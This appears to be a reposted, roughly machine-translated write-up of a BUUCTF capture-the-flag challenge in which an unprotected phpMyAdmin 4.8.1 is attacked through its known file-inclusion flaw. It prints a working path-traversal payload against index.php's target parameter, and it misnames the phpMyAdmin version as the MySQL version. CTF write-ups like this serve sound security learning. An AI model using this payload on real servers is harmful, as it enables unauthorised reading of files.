当前位置：网站首页>Buuctf-[[gwctf 2019] I have a database (xiaoyute detailed explanation)

Buuctf-[[gwctf 2019] I have a database (xiaoyute detailed explanation)

2022-07-06 06:00:00 【Xiaoyute detailed explanation】

buuctf-[[GWCTF 2019] I have a database （ Xiaoyute detailed explanation ）

Here I don't know why the display is garbled

Use it directly dirsearch Scan the website

Here we are phpmyadmin Catalog , Login without password succeeded .

The version number is given here MySQL database Version 4.8.1.

This version contains a file vulnerability

The principle of vulnerability is

utilize / send db_datadict.php? Become a nonexistent Directory , utilize include The directory of functions keeps jumping, trying to get flag Catalog .

payload

phpmyadmin/index.php?target=db_datadict.php?/../../../../../flag

原网站

版权声明
本文为[Xiaoyute detailed explanation]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/02/202202132031259807.html

当前位置：网站首页>Buuctf-[[gwctf 2019] I have a database (xiaoyute detailed explanation)

Buuctf-[[gwctf 2019] I have a database (xiaoyute detailed explanation)

buuctf-[[GWCTF 2019] I have a database （ Xiaoyute detailed explanation ）

边栏推荐

猜你喜欢

随机推荐